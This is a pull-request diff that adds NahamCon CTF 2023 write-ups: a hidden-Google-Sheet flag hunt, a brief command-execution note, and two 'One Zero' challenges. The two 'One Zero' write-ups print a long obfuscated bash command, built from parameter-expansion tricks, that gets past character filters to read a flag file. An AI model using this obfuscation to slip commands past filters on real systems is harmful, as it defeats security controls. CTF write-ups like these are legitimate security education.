Merge pull request #6 from yaudahbanh/Nahamcon-CTF-2023
Add: Goose Chase, One Zero, One Zero Two, Reginapull/8/merge
|
@ -0,0 +1,29 @@
|
|||
# Goose Chase
|
||||
|
||||
> I am truly sorry. I really do apologize... I hope you can bear with me as I set you all loose together, on a communal collaboriative wild goose chase.
|
||||
|
||||
[Google sheets link](https://docs.google.com/spreadsheets/d/17qy0Yw1_8rLOhrG5MWT8rWzpMi3_1vr3A_khcv3j6Cc/)
|
||||
|
||||
## How to Solve
|
||||
|
||||
First visit the google sheets link
|
||||
|
||||
After that make copy from the sheets
|
||||
|
||||
![solve](images/solve.jpg)
|
||||
|
||||
Access the hidden sheet
|
||||
|
||||
![solve2](images/solve2.jpg)
|
||||
|
||||
You will see the link to the other sheets
|
||||
|
||||
![solve3](images/solve3.jpg)
|
||||
|
||||
View-source the sheets, and you get the flag
|
||||
|
||||
![flag](images/flag.jpg)
|
||||
|
||||
```
|
||||
flag{323264294cc2a4ebb2c8d5f9e0afb0f7}
|
||||
```
|
After Width: | Height: | Size: 11 KiB |
After Width: | Height: | Size: 22 KiB |
After Width: | Height: | Size: 5.2 KiB |
After Width: | Height: | Size: 46 KiB |
|
@ -0,0 +1,21 @@
|
|||
# One Zero
|
||||
|
||||
> You only get one zero... for real this time. ;)
|
||||
|
||||
## How to Solve
|
||||
|
||||
To solve this you need bash obfuscate method
|
||||
|
||||
[Bash Obfuscate Tool](https://gist.github.com/dimasma0305/c3d5d3cac71c8240a491a3010f2372b8)
|
||||
|
||||
The original payload is `bash <<< {cat, flag.txt}`
|
||||
|
||||
After obfuscate became this
|
||||
|
||||
```${!#} <<< {$\'\\${##}$((${##}<<$((${##}))<<$((${##}))))$((${##}<<$((${##}))^${##}))\\${##}$((${##}<<$((${##}))<<$((${##}))))${##}\\${##}$(($((${##}<<$((${##}))^${##}))<<${##}))$((${##}<<$((${##}))<<$((${##}))))\',$\'\\${##}$((${##}<<$((${##}))<<$((${##}))))$(($((${##}<<$((${##}))^${##}))<<${##}))\\${##}$((${##}<<$((${##}))<<$((${##}))^${##}))$((${##}<<$((${##}))<<$((${##}))))\\${##}$((${##}<<$((${##}))<<$((${##}))))${##}\\${##}$((${##}<<$((${##}))<<$((${##}))))$(($((${##}<<$((${##}))^${##}))<<${##}^${##}))\\$((${##}<<$((${##}))<<$((${##}))^${##}))$(($((${##}<<$((${##}))^${##}))<<${##}))\\${##}$(($((${##}<<$((${##}))^${##}))<<${##}))$((${##}<<$((${##}))<<$((${##}))))\\${##}$(($((${##}<<$((${##}))^${##}))<<${##}^${##}))${#}\\${##}$(($((${##}<<$((${##}))^${##}))<<${##}))$((${##}<<$((${##}))<<$((${##}))))\',}```
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
flag{5d15f415ef8e8601f80340761c5918be}
|
||||
```
|
After Width: | Height: | Size: 490 KiB |
|
@ -0,0 +1,21 @@
|
|||
# One Zero
|
||||
|
||||
> You only get one zero. ;)
|
||||
|
||||
## How to Solve
|
||||
|
||||
To solve this you need bash obfuscate method
|
||||
|
||||
[Bash Obfuscate Tool](https://gist.github.com/dimasma0305/c3d5d3cac71c8240a491a3010f2372b8)
|
||||
|
||||
The original payload is `bash <<< {cat, flag.txt}`
|
||||
|
||||
After obfuscate became this
|
||||
|
||||
```${!#} <<< {$\'\\${##}$((${##}<<$((${##}))<<$((${##}))))$((${##}<<$((${##}))^${##}))\\${##}$((${##}<<$((${##}))<<$((${##}))))${##}\\${##}$(($((${##}<<$((${##}))^${##}))<<${##}))$((${##}<<$((${##}))<<$((${##}))))\',$\'\\${##}$((${##}<<$((${##}))<<$((${##}))))$(($((${##}<<$((${##}))^${##}))<<${##}))\\${##}$((${##}<<$((${##}))<<$((${##}))^${##}))$((${##}<<$((${##}))<<$((${##}))))\\${##}$((${##}<<$((${##}))<<$((${##}))))${##}\\${##}$((${##}<<$((${##}))<<$((${##}))))$(($((${##}<<$((${##}))^${##}))<<${##}^${##}))\\$((${##}<<$((${##}))<<$((${##}))^${##}))$(($((${##}<<$((${##}))^${##}))<<${##}))\\${##}$(($((${##}<<$((${##}))^${##}))<<${##}))$((${##}<<$((${##}))<<$((${##}))))\\${##}$(($((${##}<<$((${##}))^${##}))<<${##}^${##}))${#}\\${##}$(($((${##}<<$((${##}))^${##}))<<${##}))$((${##}<<$((${##}))<<$((${##}))))\',}```
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
flag{81b9de37f5bd218c9f59ac2d9d709bf6}
|
||||
```
|
After Width: | Height: | Size: 287 KiB |
|
@ -13,6 +13,13 @@ CTF writeup for The NahamCon CTF 2023. I took part in this CTF competition with
|
|||
| Web | [Hidden Figures](/NahamCon%20CTF%202023/Hidden%20Figures/)
|
||||
| Web | [Star Wars](/NahamCon%20CTF%202023/Star%20Wars/)
|
||||
| Web | [Sticker](/NahamCon%20CTF%202023/Stickers/)
|
||||
| Mobile | [JNInjaSpeak](/NahamCon%20CTF%202023/JNInjaSpeak/)
|
||||
| Warmups | [Glasses](/NahamCon%20CTF%202023/Glasses/)
|
||||
| Warmups | [Regina](/NahamCon%20CTF%202023/Regina/)
|
||||
| Warmups | [tiny little fibers](/NahamCon%20CTF%202023/tiny%20little%20fibers/)
|
||||
| Misc | [Where's My Water?](/NahamCon%20CTF%202023/Where's%20My%20Water/)
|
||||
| Misc | [Wordle Bash](/NahamCon%20CTF%202023/Wordle%20Bash/)
|
||||
| Misc | [Zombie](/NahamCon%20CTF%202023/Zombie/)
|
||||
| Misc | [Goose Chase](/NahamCon%20CTF%202023/Goose%20Chase/)
|
||||
| Misc | [One Zero](/NahamCon%20CTF%202023/One%20Zero/)
|
||||
| Misc | [One Zero Two](/NahamCon%20CTF%202023/One%20Zero%20Two/)
|
|
@ -0,0 +1,18 @@
|
|||
# Regina
|
||||
|
||||
> I have a tyrannosaurus rex plushie and I named it Regina! Here, you can talk to it :)
|
||||
|
||||
## How to Solve
|
||||
|
||||
First you make a parse command to execute in the server, after that you `CTRL + D`
|
||||
to send signal the end of input (EOF)
|
||||
|
||||
![solve1](images/solve1.png)
|
||||
|
||||
And then reproduce same process and read the flag
|
||||
|
||||
![flag](images/flag.png)
|
||||
|
||||
```
|
||||
flag{2459b9ae7c704979948318cd2f47dfd6}
|
||||
```
|
After Width: | Height: | Size: 140 KiB |
After Width: | Height: | Size: 328 KiB |